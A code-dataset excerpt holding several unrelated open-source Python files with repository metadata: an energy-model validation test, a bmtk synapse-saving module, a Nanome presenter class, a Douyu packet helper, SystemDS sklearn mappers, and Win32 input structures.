print('Biogas net production error : ', error_biogas_net_prod, ' %',
f'IEA :{biogas_net_prod_iea} TWh vs WITNESS :{net_biogas_prod} TWh')
'''
Oil balances
'''
print('---------- Oil balances -------------')
iea_data_oil = {'kerosene': (14082582 + 2176724) / 3600,
# gasoline + diesel
'gasoline': (41878252 + 56524612) / 3600,
#'diesel': 56524612 / 3600,
#'naphtas' :11916946/3600,
'heating_oil': 16475667 / 3600, # equivalent to fuel oil
#'other_oil_products' :25409482/3600,
'liquefied_petroleum_gas': 5672984 / 3600, # LPG/ethane
'fuel.liquid_fuel': 190442343 / 3600 # total of crude oil
}
raw_refinery_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.fuel.liquid_fuel.Refinery.techno_production')
raw_refinery_prod_2020 = raw_refinery_prod.loc[
raw_refinery_prod['years'] == 2020] * 1000.0
for oil_name, oil_prod in iea_data_oil.items():
oil_prod_witness = raw_refinery_prod_2020[
f'{oil_name} (TWh)'].values[0]
error_oil_prod = np.abs(
oil_prod - oil_prod_witness) / oil_prod * 100.0
print(f'{oil_name} raw production error : ', error_oil_prod, ' %',
f'IEA :{oil_prod} TWh vs WITNESS :{oil_prod_witness} TWh')
print(
'WITNESS model only takes for now raw liquid_fuel production which is correct')
net_liquid_fuel_prod = net_energy_production[
'production fuel.liquid_fuel (TWh)'][0]
liquid_fuel_net_prod_iea = 168375005 / 3600
error_liquid_fuel_net_prod = np.abs(
liquid_fuel_net_prod_iea - net_liquid_fuel_prod) / liquid_fuel_net_prod_iea * 100.0
print('Liquid fuel net production error : ', error_liquid_fuel_net_prod, ' %',
f'IEA :{liquid_fuel_net_prod_iea} TWh vs WITNESS :{net_liquid_fuel_prod} TWh')
liquid_fuel_own_use = 2485.89 # TWH
liquid_fuel_raw_prod = raw_refinery_prod_2020[
            'fuel.liquid_fuel (TWh)'].values[0]
energy_production_raw_liquidfuel_iea = 52900 - liquid_fuel_own_use
print(
f'Energy own use for liquid fuel production is {liquid_fuel_own_use} TWh')
        error_liquid_fuel_raw_prod = np.abs(
            energy_production_raw_liquidfuel_iea - liquid_fuel_raw_prod) / energy_production_raw_liquidfuel_iea * 100.0
        print('Liquid fuel raw production error : ', error_liquid_fuel_raw_prod, ' %',
              f'IEA :{energy_production_raw_liquidfuel_iea} TWh vs WITNESS :{liquid_fuel_raw_prod} TWh')
chp_plants = 159.62 + 99.81 # TWh
print('CHP and heat plants not implemented corresponds to ',
chp_plants / liquid_fuel_raw_prod * 100.0, ' % of total raw liquid fuel production : ', chp_plants, ' TWh')
oil_elec_plants = 1591.67 # TWh
# elec plants needs
elec_plants_oil = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'fuel.liquid_fuel (TWh)'][0] * 1000.0
error_oil_cons = np.abs(
oil_elec_plants - elec_plants_oil) / oil_elec_plants * 100.0
print('Liquid fuel consumption from elec error : ', error_oil_cons, ' %',
f'IEA :{oil_elec_plants} TWh vs WITNESS :{elec_plants_oil} TWh')
print('----------------- Total production -------------------')
total_raw_prod_iea = 173340 # TWh
total_raw_prod = energy_production['Total production'][0]
error_total_raw_prod = np.abs(
total_raw_prod_iea - total_raw_prod) / total_raw_prod_iea * 100.0
print('Total raw production error : ', error_total_raw_prod, ' %',
f'IEA :{total_raw_prod_iea} TWh vs WITNESS :{total_raw_prod} TWh')
total_net_prod_iea = 116103 # TWh
total_net_prod = net_energy_production['Total production'][0]
error_total_net_prod = np.abs(
total_net_prod_iea - total_net_prod) / total_net_prod_iea * 100.0
print('Total net production error : ', error_total_net_prod, ' %',
f'IEA :{total_net_prod_iea} TWh vs WITNESS :{total_net_prod} TWh')
def test_04_check_prices_values(self):
'''
Test order of magnitude of prices
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
'''
self.ee.execute()
        # Prices below are in $/MWh
energy_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_prices')
energy_prices_after_tax = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_prices_after_tax')
'''
Energy prices
'''
print('Comparison of prices coming from globalpetrolprices.com')
elec_price_iea = 137 # $/MWh
elec_price = energy_prices[
'electricity'][0]
error_elec_price = np.abs(
elec_price_iea - elec_price) / elec_price_iea * 100.0
print('Electricity price error in 2021: ', error_elec_price, ' %',
f'globalpetrolprices.com :{elec_price_iea} $/MWh vs WITNESS :{elec_price} $/MWh')
ng_price_iea_2022 = 1.17 / 0.657e-3 / 13.9 # $/MWh
ng_price_iea_2021 = 0.8 / 0.657e-3 / 13.9 # $/MWh
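        # assumed reading of the constants: a $/m3 price divided by the methane density
        # (0.657e-3 t/m3) and a calorific value of 13.9 MWh/t gives $/MWh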
ng_price = energy_prices[
'methane'][0]
error_ng_price = np.abs(
ng_price_iea_2021 - ng_price) / ng_price_iea_2021 * 100.0
print('Natural Gas/Methane price error in 2021 : ', error_ng_price, ' %',
f'globalpetrolprices.com :{ng_price_iea_2021} $/MWh vs WITNESS :{ng_price} $/MWh')
kerosene_price_iea = 0.92 / 0.0095 # $/MWh in 2022
kerosene_price_iea_2021 = 2.8 / 39.5 * 1000 # $/MWh in 2021
kerosene_price = energy_prices[
'fuel.liquid_fuel'][0]
error_kerosene_price = np.abs(
kerosene_price_iea_2021 - kerosene_price) / kerosene_price_iea_2021 * 100.0
print('kerosene price error in 2021 : ', error_kerosene_price, ' %',
f'globalpetrolprices.com :{kerosene_price_iea_2021} $/MWh vs WITNESS :{kerosene_price} $/MWh')
print('hydrogen prices details have been found on IEA website :https://www.iea.org/data-and-statistics/charts/global-average-levelised-cost-of-hydrogen-production-by-energy-source-and-technology-2019-and-2050 ')
hydrogen_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.hydrogen.gaseous_hydrogen.energy_detailed_techno_prices')
        smr_price_iea = 1.6 / 33.3 * 1000 # between 0.7 and 1.6 $/kg; the upper bound is used here
        # between 1.9 and 2.5 $/kg; the upper bound is used here
        coal_gas_price_iea = 2.5 / 33.3 * 1000
wgs_price = hydrogen_prices[
'WaterGasShift'][0]
wgs_price_iea = 0.75 * smr_price_iea + 0.25 * coal_gas_price_iea
error_wgs_price = np.abs(
wgs_price_iea - wgs_price) / wgs_price_iea * 100.0
print('Hydrogen price by watergas shift (coal and gas) error in 2021: ', error_wgs_price, ' %',
f'IEA :{wgs_price_iea} $/MWh vs WITNESS :{wgs_price} $/MWh')
electrolysis_price_iea = 7.7 / 33.3 * 1000 # between 3.2 and 7.7 $/kg
electrolysis_price = hydrogen_prices[
'Electrolysis.SOEC'][0]
error_electrolysis_price = np.abs(
electrolysis_price_iea - electrolysis_price) / electrolysis_price_iea * 100.0
print('Hydrogen price by Electrolysis error in 2021: ', error_electrolysis_price, ' %',
f'IEA :{electrolysis_price_iea} $/MWh vs WITNESS :{electrolysis_price} $/MWh')
biogas_price_gazpack = 30 / 0.293 # 30 $/mbtu
biogas_price = energy_prices[
'biogas'][0]
error_biogas_price = np.abs(
biogas_price_gazpack - biogas_price) / biogas_price_gazpack * 100.0
print('Biogas price error in 2019: ', error_biogas_price, ' %',
f'gazpack.nl/ :{biogas_price_gazpack} $/MWh vs WITNESS :{biogas_price} $/MWh')
# between 50 and 100 $ /tonne
coal_price_ourworldindata = 50 * 1e-3 / 4.86 * 1e3
coal_price = energy_prices[
'solid_fuel'][0]
error_coal_price = np.abs(
coal_price_ourworldindata - coal_price) / coal_price_ourworldindata * 100.0
print('Coal price error in 2021: ', error_coal_price, ' %',
f'ourworldindata.com :{coal_price_ourworldindata} $/MWh vs WITNESS :{coal_price} $/MWh')
biodiesel_price_neste = 1500 / 10.42
biodiesel_price = energy_prices[
'fuel.biodiesel'][0]
error_biodiesel_price = np.abs(
biodiesel_price_neste - biodiesel_price) / biodiesel_price_neste * 100.0
print('Biodiesel price error in 2021: ', error_biodiesel_price, ' %',
f'neste.com :{biodiesel_price_neste} $/MWh vs WITNESS :{biodiesel_price} $/MWh')
biomass_price_statista = 35 / 3.6
biomass_price = energy_prices[
'biomass_dry'][0]
error_biomass_price = np.abs(
biomass_price_statista - biomass_price) / biomass_price_statista * 100.0
print('Biomass price error in 2021: ', error_biomass_price, ' %',
f'US statista.com :{biomass_price_statista} $/MWh vs WITNESS :{biomass_price} $/MWh')
hefa_price_iea = 1.2 / 780e-3 / 12.2 * 1000
hefa_price = energy_prices[
'fuel.hydrotreated_oil_fuel'][0]
error_hefa_price = np.abs(
hefa_price_iea - hefa_price) / hefa_price_iea * 100.0
print('HEFA price error in 2020: ', error_hefa_price, ' %',
f'IEA :{hefa_price_iea} $/MWh vs WITNESS :{hefa_price} $/MWh')
print('------------- Electricity prices --------------')
elec_detailed_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.energy_detailed_techno_prices')
        print('Nuclear detailed electricity price in 2020: ',
              elec_detailed_prices['Nuclear'].values[0], ' $/MWh')
if '__main__' == __name__:
t0 = time.time()
cls = TestGlobalEnergyValues()
cls.setUp()
cls.test_03_check_net_production_values()
print(f'Time : {time.time() - t0} s')
| 47.680769 | 304 | 0.638239 | 49,047 | 0.98909 | 0 | 0 | 0 | 0 | 0 | 0 | 28,559 | 0.575926 |
396aa7d766efce4140f100be9476c86629b27ef9 | 11,383 | py | Python | bmtk/simulator/bionet/modules/save_synapses.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | ["BSD-3-Clause"] | 1 | 2019-03-27T12:23:09.000Z | 2019-03-27T12:23:09.000Z | bmtk/simulator/bionet/modules/save_synapses.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | ["BSD-3-Clause"] | null | null | null | bmtk/simulator/bionet/modules/save_synapses.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | ["BSD-3-Clause"] | null | null | null
import os
import csv
import h5py
import numpy as np
from neuron import h
from .sim_module import SimulatorMod
from bmtk.simulator.bionet.biocell import BioCell
from bmtk.simulator.bionet.io_tools import io
from bmtk.simulator.bionet.pointprocesscell import PointProcessCell
pc = h.ParallelContext()
MPI_RANK = int(pc.id())
N_HOSTS = int(pc.nhost())
class SaveSynapses(SimulatorMod):
def __init__(self, network_dir, single_file=False, **params):
self._network_dir = network_dir
self._virt_lookup = {}
self._gid_lookup = {}
self._sec_lookup = {}
if not os.path.exists(network_dir):
os.makedirs(network_dir)
if N_HOSTS > 1:
            io.log_exception('save_synapses module is not currently supported with mpi')
self._syn_writer = ConnectionWriter(network_dir)
def _print_nc(self, nc, src_nid, trg_nid, cell, src_pop, trg_pop, edge_type_id):
if isinstance(cell, BioCell):
sec_x = nc.postloc()
sec = h.cas()
sec_id = self._sec_lookup[cell.gid][sec] #cell.get_section_id(sec)
h.pop_section()
self._syn_writer.add_bio_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0], sec_id, sec_x)
# print '{} ({}) <-- {} ({}), {}, {}, {}, {}'.format(trg_nid, trg_pop, src_nid, src_pop, nc.weight[0], nc.delay, sec_id, sec_x)
else:
self._syn_writer.add_point_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0])
#print '{} ({}) <-- {} ({}), {}, {}'.format(trg_nid, trg_pop, src_nid, src_pop, nc.weight[0], nc.delay)
def initialize(self, sim):
io.log_info('Saving network connections. This may take a while.')
# Need a way to look up virtual nodes from nc.pre()
for pop_name, nodes_table in sim.net._virtual_nodes.items():
for node_id, virt_node in nodes_table.items():
self._virt_lookup[virt_node.hobj] = (pop_name, node_id)
# Need to figure out node_id and pop_name from nc.srcgid()
for node_pop in sim.net.node_populations:
pop_name = node_pop.name
for node in node_pop[0::1]:
if node.model_type != 'virtual':
self._gid_lookup[node.gid] = (pop_name, node.node_id)
for gid, cell in sim.net.get_local_cells().items():
trg_pop, trg_id = self._gid_lookup[gid]
if isinstance(cell, BioCell):
#from pprint import pprint
#pprint({i: s_name for i, s_name in enumerate(cell.get_sections())})
#exit()
# sections = cell._syn_seg_ix
self._sec_lookup[gid] = {sec_name: sec_id for sec_id, sec_name in enumerate(cell.get_sections_id())}
else:
sections = [-1]*len(cell.netcons)
for nc, edge_type_id in zip(cell.netcons, cell._edge_type_ids):
src_gid = int(nc.srcgid())
if src_gid == -1:
# source is a virtual node
src_pop, src_id = self._virt_lookup[nc.pre()]
else:
src_pop, src_id = self._gid_lookup[src_gid]
self._print_nc(nc, src_id, trg_id, cell, src_pop, trg_pop, edge_type_id)
self._syn_writer.close()
io.log_info(' Done saving network connections.')
class ConnectionWriter(object):
class H5Index(object):
def __init__(self, network_dir, src_pop, trg_pop):
# TODO: Merge with NetworkBuilder code for building SONATA files
self._nsyns = 0
self._n_biosyns = 0
self._n_pointsyns = 0
self._block_size = 5
self._pop_name = '{}_{}'.format(src_pop, trg_pop)
self._h5_file = h5py.File(os.path.join(network_dir, '{}_edges.h5'.format(self._pop_name)), 'w')
self._pop_root = self._h5_file.create_group('/edges/{}'.format(self._pop_name))
self._pop_root.create_dataset('edge_group_id', (self._block_size, ), dtype=np.uint16,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('source_node_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root['source_node_id'].attrs['node_population'] = src_pop
self._pop_root.create_dataset('target_node_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root['target_node_id'].attrs['node_population'] = trg_pop
self._pop_root.create_dataset('edge_type_id', (self._block_size, ), dtype=np.uint32,
chunks=(self._block_size, ), maxshape=(None, ))
            self._pop_root.create_dataset('0/syn_weight', (self._block_size, ), dtype=np.float64,
                                          chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/sec_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
            self._pop_root.create_dataset('0/sec_x', (self._block_size, ), chunks=(self._block_size, ),
                                          maxshape=(None, ), dtype=np.float64)
            self._pop_root.create_dataset('1/syn_weight', (self._block_size, ), dtype=np.float64,
                                          chunks=(self._block_size, ), maxshape=(None, ))
def _add_conn(self, edge_type_id, src_id, trg_id, grp_id):
self._pop_root['edge_type_id'][self._nsyns] = edge_type_id
self._pop_root['source_node_id'][self._nsyns] = src_id
self._pop_root['target_node_id'][self._nsyns] = trg_id
self._pop_root['edge_group_id'][self._nsyns] = grp_id
self._nsyns += 1
if self._nsyns % self._block_size == 0:
self._pop_root['edge_type_id'].resize((self._nsyns + self._block_size,))
self._pop_root['source_node_id'].resize((self._nsyns + self._block_size, ))
self._pop_root['target_node_id'].resize((self._nsyns + self._block_size, ))
self._pop_root['edge_group_id'].resize((self._nsyns + self._block_size, ))
def add_bio_conn(self, edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x):
self._add_conn(edge_type_id, src_id, trg_id, 0)
self._pop_root['0/syn_weight'][self._n_biosyns] = syn_weight
self._pop_root['0/sec_id'][self._n_biosyns] = sec_id
self._pop_root['0/sec_x'][self._n_biosyns] = sec_x
self._n_biosyns += 1
if self._n_biosyns % self._block_size == 0:
self._pop_root['0/syn_weight'].resize((self._n_biosyns + self._block_size, ))
self._pop_root['0/sec_id'].resize((self._n_biosyns + self._block_size, ))
self._pop_root['0/sec_x'].resize((self._n_biosyns + self._block_size, ))
def add_point_conn(self, edge_type_id, src_id, trg_id, syn_weight):
self._add_conn(edge_type_id, src_id, trg_id, 1)
self._pop_root['1/syn_weight'][self._n_pointsyns] = syn_weight
self._n_pointsyns += 1
if self._n_pointsyns % self._block_size == 0:
self._pop_root['1/syn_weight'].resize((self._n_pointsyns + self._block_size, ))
def clean_ends(self):
self._pop_root['source_node_id'].resize((self._nsyns,))
self._pop_root['target_node_id'].resize((self._nsyns,))
self._pop_root['edge_group_id'].resize((self._nsyns,))
self._pop_root['edge_type_id'].resize((self._nsyns,))
self._pop_root['0/syn_weight'].resize((self._n_biosyns,))
self._pop_root['0/sec_id'].resize((self._n_biosyns,))
self._pop_root['0/sec_x'].resize((self._n_biosyns,))
self._pop_root['1/syn_weight'].resize((self._n_pointsyns,))
eg_ds = self._pop_root.create_dataset('edge_group_index', (self._nsyns, ), dtype=np.uint64)
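            # edge_group_index (SONATA layout): for every edge row, its offset inside its
            # own model group (group 0 = biophysical, group 1 = point process)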
bio_count, point_count = 0, 0
for idx, grp_id in enumerate(self._pop_root['edge_group_id']):
if grp_id == 0:
eg_ds[idx] = bio_count
bio_count += 1
elif grp_id == 1:
eg_ds[idx] = point_count
point_count += 1
self._create_index('target')
def _create_index(self, index_type='target'):
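            """Build a SONATA-style two-level lookup index (sketch of the logic below).
            node_id_to_range maps a node id to a span of rows in range_to_edge_id, and
            each of those rows stores a contiguous [begin, end) block of edge ids; the
            -1 sentinel appended to edge_nodes closes the last block. Edges are assumed
            to be grouped by the indexed node id.
            """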
if index_type == 'target':
edge_nodes = np.array(self._pop_root['target_node_id'], dtype=np.int64)
output_grp = self._pop_root.create_group('indicies/target_to_source')
elif index_type == 'source':
edge_nodes = np.array(self._pop_root['source_node_id'], dtype=np.int64)
output_grp = self._pop_root.create_group('indicies/source_to_target')
edge_nodes = np.append(edge_nodes, [-1])
n_targets = np.max(edge_nodes)
            ranges_list = [[] for _ in range(n_targets + 1)]
n_ranges = 0
begin_index = 0
cur_trg = edge_nodes[begin_index]
for end_index, trg_gid in enumerate(edge_nodes):
if cur_trg != trg_gid:
ranges_list[cur_trg].append((begin_index, end_index))
cur_trg = int(trg_gid)
begin_index = end_index
n_ranges += 1
node_id_to_range = np.zeros((n_targets + 1, 2))
range_to_edge_id = np.zeros((n_ranges, 2))
range_index = 0
for node_index, trg_ranges in enumerate(ranges_list):
if len(trg_ranges) > 0:
node_id_to_range[node_index, 0] = range_index
for r in trg_ranges:
range_to_edge_id[range_index, :] = r
range_index += 1
node_id_to_range[node_index, 1] = range_index
output_grp.create_dataset('range_to_edge_id', data=range_to_edge_id, dtype='uint64')
output_grp.create_dataset('node_id_to_range', data=node_id_to_range, dtype='uint64')
def __init__(self, network_dir):
self._network_dir = network_dir
self._pop_groups = {}
def _group_key(self, src_pop, trg_pop):
return (src_pop, trg_pop)
def _get_edge_group(self, src_pop, trg_pop):
grp_key = self._group_key(src_pop, trg_pop)
if grp_key not in self._pop_groups:
self._pop_groups[grp_key] = self.H5Index(self._network_dir, src_pop, trg_pop)
return self._pop_groups[grp_key]
def add_bio_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight, sec_id, sec_x):
h5_grp = self._get_edge_group(src_pop, trg_pop)
h5_grp.add_bio_conn(edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x)
def add_point_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight):
h5_grp = self._get_edge_group(src_pop, trg_pop)
h5_grp.add_point_conn(edge_type_id, src_id, trg_id, syn_weight)
def close(self):
for _, h5index in self._pop_groups.items():
h5index.clean_ends()
| 48.233051 | 139 | 0.598876 | 11,025 | 0.96855 | 0 | 0 | 0 | 0 | 0 | 0 | 1,474 | 0.129491 |
396b128eaea90d279b0b41fb297fa2fa82ed6d87 | 1,930 | py | Python | nanome/api/user/presenter_info.py | nanome-ai/nanome-plugin-api | f2ce6a5e3123ee7449a90c2659f3891124289f4a | ["MIT"] | 3 | 2020-07-02T13:08:27.000Z | 2021-11-24T14:32:53.000Z | nanome/api/user/presenter_info.py | nanome-ai/nanome-plugin-api | f2ce6a5e3123ee7449a90c2659f3891124289f4a | ["MIT"] | 11 | 2020-09-14T17:01:47.000Z | 2022-02-18T04:00:52.000Z | nanome/api/user/presenter_info.py | nanome-ai/nanome-plugin-api | f2ce6a5e3123ee7449a90c2659f3891124289f4a | ["MIT"] | 5 | 2020-08-12T16:30:03.000Z | 2021-12-06T18:04:23.000Z
class PresenterInfo():
"""
| Class to fetch information about the current nanome session's presenter.
"""
def __init__(self):
self._account_id = ""
self._account_name = ""
self._account_email = ""
self._has_org = False
self._org_id = 0
self._org_name = ""
@property
def account_id(self):
"""
| The Nanome account ID of the presenter
:type: :class:`str`
"""
return self._account_id
@account_id.setter
def account_id(self, value):
self._account_id = value
@property
def account_name(self):
"""
| The Nanome account name of the presenter
:type: :class:`str`
"""
return self._account_name
@account_name.setter
def account_name(self, value):
self._account_name = value
@property
def account_email(self):
"""
| The Nanome account email of the presenter
:type: :class:`str`
"""
return self._account_email
@account_email.setter
def account_email(self, value):
self._account_email = value
@property
def has_org(self):
"""
| If the presenter belongs to an organization
:type: :class:`bool`
"""
return self._has_org
@has_org.setter
def has_org(self, value):
self._has_org = value
@property
def org_id(self):
"""
| The ID of the organization the presenter belongs to
:type: :class:`int`
"""
return self._org_id
@org_id.setter
def org_id(self, value):
self._org_id = value
@property
def org_name(self):
"""
| The name of the organization the presenter belongs to
:type: :class:`str`
"""
return self._org_name
@org_name.setter
def org_name(self, value):
self._org_name = value
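if __name__ == '__main__':
    # Minimal usage sketch with illustrative values; in practice this object is
    # filled in by the plugin framework rather than constructed by hand.
    info = PresenterInfo()
    info.account_name = 'Jane Doe'
    info.has_org = True
    info.org_name = 'Example Org'
    print(info.account_name, 'belongs to', info.org_name)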
| 21.208791 | 78 | 0.564249 | 1,929 | 0.999482 | 0 | 0 | 1,537 | 0.796373 | 0 | 0 | 695 | 0.360104 |
396be9b8e76a36fa6d51ae0f674f69f4c1dcf376 | 1,217 | py | Python | pydouyu/packet_util.py | Kexiii/pydouyu | 494732159980b7b71575e6757899c48052c6c2e0 | ["MIT"] | 11 | 2019-02-22T01:02:32.000Z | 2021-12-15T08:50:26.000Z | pydouyu/packet_util.py | Kexiii/pydouyu | 494732159980b7b71575e6757899c48052c6c2e0 | ["MIT"] | 2 | 2020-07-05T01:26:18.000Z | 2021-01-07T15:22:57.000Z | pydouyu/packet_util.py | Kexiii/pydouyu | 494732159980b7b71575e6757899c48052c6c2e0 | ["MIT"] | 3 | 2019-04-23T01:22:20.000Z | 2021-12-04T09:09:16.000Z
import time
client_msg_type = 689
reserved_data_field = 0
def assemble_login_str(room_id):
res = "type@=loginreq/roomid@=" + str(room_id) + "/"
return res
def assemble_join_group_str(room_id):
res = "type@=joingroup/rid@=" + str(room_id) + "/gid@=-9999/";
return res
def assemble_heartbeat_str():
res = "type@=keeplive/tick@=%s/" % int(time.time()) + "/"
return res
def assemble_transfer_data(ori_str):
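    # Douyu client frame layout, as implemented below: two identical
    # little-endian 4-byte length fields, a 2-byte message type (689 =
    # client-to-server), a 2-byte reserved field, the UTF-8 payload and a
    # terminating null byte.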
data_size = len(ori_str)
    packet_size = 4 * 2 + data_size + 1
data = packet_size.to_bytes(4, byteorder='little')
data += packet_size.to_bytes(4, byteorder='little')
data += client_msg_type.to_bytes(2, byteorder='little')
data += reserved_data_field.to_bytes(2, byteorder='little')
data += ori_str.encode()
data += b'\0'
return data
def extract_str_from_data(data):
packet_size = int.from_bytes(data[0:4], byteorder='little')
if packet_size != len(data):
return ""
return data[8:].decode("utf8", "ignore")
def parse_str_to_dict(ori_str):
res = {}
    ori_strs = ori_str.split("/")
for ori_str in ori_strs:
kv = ori_str.split("@=")
if len(kv) == 2:
res[kv[0]] = kv[1]
return res
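if __name__ == '__main__':
    # Minimal sketch; the room id is an illustrative value.
    login_msg = assemble_login_str(288016)
    print(assemble_transfer_data(login_msg))
    print(parse_str_to_dict(login_msg))  # {'type': 'loginreq', 'roomid': '288016'}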
| 23.403846 | 66 | 0.632703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 162 | 0.133114 |
396d4f672042b6ba26b0ebbbfccf8610a433735a | 2,976 | py | Python | scripts/staging/sklearn/mappers/supervised.py | mgd-hin/systemds | 08944a7305cbc4f4d9cbbd4565efa8bcc93b82e3 | ["Apache-2.0"] | 372 | 2017-06-09T01:02:53.000Z | 2020-06-24T05:45:00.000Z | scripts/staging/sklearn/mappers/supervised.py | ywcb00/systemds | 5cc523971854cdf4f22e6199987a86e213fae4e2 | ["Apache-2.0"] | 418 | 2017-06-08T16:27:44.000Z | 2020-06-25T12:15:54.000Z | scripts/staging/sklearn/mappers/supervised.py | ywcb00/systemds | 5cc523971854cdf4f22e6199987a86e213fae4e2 | ["Apache-2.0"] | 190 | 2017-06-08T19:32:54.000Z | 2020-06-15T12:26:12.000Z
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
from .mapper import Mapper
class LinearSVMMapper(Mapper):
name = 'l2svm'
sklearn_name = 'linearsvc'
is_supervised = True
mapped_output = [
'model'
]
def map_params(self):
self.mapped_params = [
'TRUE' if self.params.get('fit_intercept', False) else 'FALSE',
self.params.get('tol', 0.001),
self.params.get('C', 1.0),
self.params.get('max_iter', 100),
            20, # maxii parameter is unknown in sklearn and not documented in dml
            'TRUE' if self.params.get('verbose', False) else 'FALSE',
            -1 # column_id is unknown in sklearn
]
class TweedieRegressorMapper(Mapper):
name = 'glm'
sklearn_name = 'tweedieregressor'
is_supervised = True
mapped_output = [
'beta'
]
def map_params(self):
# TODO: many parameters cannot be mapped directly:
# how to handle defaults for dml?
self.mapped_params = [
1, # sklearn impl supports power only, dfam
self.params.get('power', 0.0), # vpow
0, # link
1.0, # lpow
0.0, # yneg
# sklearn does not know last case
0 if self.params.get('fit_intercept', 1) else 1, # icpt
0.0, # disp
0.0, # reg
self.params.get('tol', 0.000001), # tol
200, # moi
0, # mii,
'TRUE' if self.params.get('verbose', False) else 'FALSE'
]
class LogisticRegressionMapper(Mapper):
name = 'multiLogReg'
sklearn_name = 'logisticregression'
is_supervised = True
mapped_output = [
'beta'
]
def map_params(self):
self.mapped_params = [
# sklearn does not know last case
0 if self.params.get('fit_intercept', 1) else 1,
self.params.get('tol', 0.000001), # tol
self.params.get('C', 0.0), # reg
100, # maxi
0, # maxii
'TRUE' if self.params.get('verbose', False) else 'FALSE'
]
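if __name__ == '__main__':
    # Minimal sketch of how a mapper turns sklearn keyword arguments into the
    # positional argument list of the corresponding DML script. The base Mapper
    # constructor lives in .mapper and is not shown here, so the sketch bypasses
    # it via __new__; the parameter values are illustrative only.
    mapper = LogisticRegressionMapper.__new__(LogisticRegressionMapper)
    mapper.params = {'fit_intercept': True, 'tol': 1e-6, 'C': 1.0, 'verbose': False}
    mapper.map_params()
    print(mapper.mapped_params)  # positional arguments for multiLogReg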
| 33.438202 | 80 | 0.576277 | 2,024 | 0.680108 | 0 | 0 | 0 | 0 | 0 | 0 | 1,517 | 0.509745 |
396e8a1e3e6aa7c66751f496564ba6b53523d4aa | 43 | py | Python | homemade_steganog/__init__.py | zoomie/homemade_steganog | 1ab0a140b6a2e0d9d36073d067a2c808c97adf38 | ["MIT"] | 1 | 2019-03-12T13:25:43.000Z | 2019-03-12T13:25:43.000Z | homemade_steganog/__init__.py | zoomie/homemade_encryption | 1ab0a140b6a2e0d9d36073d067a2c808c97adf38 | ["MIT"] | 4 | 2020-03-24T16:43:01.000Z | 2022-03-11T23:39:53.000Z | homemade_steganog/__init__.py | zoomie/homemade_encryption | 1ab0a140b6a2e0d9d36073d067a2c808c97adf38 | ["MIT"] | null | null | null
from .home import Steg
__all__ = ['Steg',]
| 14.333333 | 22 | 0.674419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 | 0.139535 |
396fa59895ef035568d0b517a96fd649c4c2ec84 | 4,364 | py | Python | xyw_macro/win32.py | xue0228/keyboard | dcb0def1d87a9197676c0f405b980a67e128ab24 | ["MIT"] | null | null | null | xyw_macro/win32.py | xue0228/keyboard | dcb0def1d87a9197676c0f405b980a67e128ab24 | ["MIT"] | null | null | null | xyw_macro/win32.py | xue0228/keyboard | dcb0def1d87a9197676c0f405b980a67e128ab24 | ["MIT"] | null | null | null
import ctypes
from ctypes import wintypes, windll
import win32api
import win32con
import win32gui
# PUL = ctypes.POINTER(ctypes.c_ulong)
PUL = ctypes.c_void_p
class KeyBdMsg(ctypes.Structure):
"""
    Structure passed to the low-level keyboard hook callback
"""
_fields_ = [
('vkCode', wintypes.DWORD),
('scanCode', wintypes.DWORD),
('flags', wintypes.DWORD),
('time', wintypes.DWORD),
('dwExtraInfo', PUL)]
class KeyBdInput(ctypes.Structure):
"""
    Structure describing a keyboard input event
"""
EXTENDEDKEY = 0x0001
KEYUP = 0x0002
SCANCODE = 0x0008
UNICODE = 0x0004
_fields_ = [("wVk", ctypes.c_ushort),
("wScan", ctypes.c_ushort),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", PUL)]
class HardwareInput(ctypes.Structure):
"""
    Structure describing a hardware input event
"""
_fields_ = [("uMsg", ctypes.c_ulong),
("wParamL", ctypes.c_short),
("wParamH", ctypes.c_ushort)]
class MouseInput(ctypes.Structure):
"""
    Structure describing a mouse input event
"""
MOVE = 0x0001
LEFTDOWN = 0x0002
LEFTUP = 0x0004
RIGHTDOWN = 0x0008
RIGHTUP = 0x0010
MIDDLEDOWN = 0x0020
MIDDLEUP = 0x0040
XDOWN = 0x0080
XUP = 0x0100
WHEEL = 0x0800
HWHEEL = 0x1000
ABSOLUTE = 0x8000
XBUTTON1 = 0x0001
XBUTTON2 = 0x0002
